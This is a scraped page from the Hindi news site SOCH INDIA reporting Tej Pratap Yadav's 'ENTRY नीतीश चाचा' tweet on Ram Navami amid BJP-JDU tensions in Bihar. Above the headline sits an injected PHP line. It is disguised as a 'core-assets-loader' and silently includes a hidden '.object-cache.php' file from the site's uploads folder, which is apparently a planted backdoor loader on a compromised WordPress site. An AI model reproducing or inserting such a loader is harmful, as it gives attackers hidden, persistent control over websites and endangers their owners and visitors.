add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); तेजस्वी के अर्जुन को रामनवमी पर याद आए मुख्यमंत्री, लिखा- ‘ENTRY नीतीश चाचा’, तेज प्रताप यादव के मन में क्या है? – SOCH INDIA
Menu

तेजस्वी के अर्जुन को रामनवमी पर याद आए मुख्यमंत्री, लिखा- ‘ENTRY नीतीश चाचा’, तेज प्रताप यादव के मन में क्या है?

nobanner

आरजेडी के विधायक और लालू प्रसाद यादव के बड़े बेटे तेज प्रताप यादव ने रविवार को ट्विटर पर एक पोस्ट कर हलचल बढ़ा दी है. पोस्ट से कई तरह के कयास लगाए जा रहे हैं.
पटनाः बिहार को विशेष राज्य का दर्जा, जातीय जनगणना, शराबबंदी समेत कई मुद्दों पर बीजेपी और जेडीयू के बीच टकराव चल रहा है. कानून व्यवस्था के मुद्दे पर सीएम नीतीश कुमार (CM Nitish Kumar) के साथ स्पीकर विजय कुमार सिन्हा की हुई बहस से इन दोनों पार्टियों के बीच तल्खी और बढ़ी थी. अब इधर आरजेडी के विधायक और लालू प्रसाद यादव (Lalu Prasad Yadav) के बड़े बेटे तेज प्रताप यादव (Tej Pratap Yadav) ने ट्विटर पर एक पोस्ट कर हलचल बढ़ा दी है.

रविवार को रामनवमी के दिन तेज प्रताप यादव ने यह पोस्ट किया है. ट्वीट कर लिखा- “रामनवमी के अवसर पर बहुत जरूरी. ENTRY नीतीश चाचा.” हालांकि पोस्ट के मायने क्या हो सकते हैं इसका तो पता नहीं लेकिन ट्विटर पर कुछ यूजर्स मजाक भी उड़ाने लगे. तेज प्रताप के पुराने ट्वीट्स को उठाकर कमेंट करने लगे. एक शख्स ने उस तस्वीर को कमेंट में पोस्ट किया है जिसमें तेज प्रताप ने कभी नीतीश कुमार के लिए लिखा था नो एंट्री नीतीश चाचा.